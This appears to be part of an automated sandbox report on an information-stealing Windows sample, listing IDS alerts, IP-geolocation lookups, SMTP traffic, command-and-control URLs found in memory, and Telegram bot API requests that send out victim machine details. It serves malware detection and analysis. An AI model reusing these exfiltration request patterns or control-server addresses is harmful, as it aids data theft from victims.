                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49815 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49796 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49847 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49943 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49893 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49933 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49839 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49963 -> 104.21.32.1:443
                  Source: global trafficTCP traffic: 192.168.2.9:49904 -> 3.130.71.34:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49770 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49888 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0058CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0058CE44
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.acadental.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:49:22 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:49:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.acadental.com
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003271000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000032E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.000000000345B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: enterogenous.exe, 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000332E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.000000000332E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3795172591.0000000003354000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.000000000339E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003359000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000003.00000002.3799235403.0000000004512000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3799235403.000000000452E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.000000000459D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3798732418.0000000004581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000007.00000002.3794762480.000000000348C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000003.00000002.3795172591.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3794762480.0000000003487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
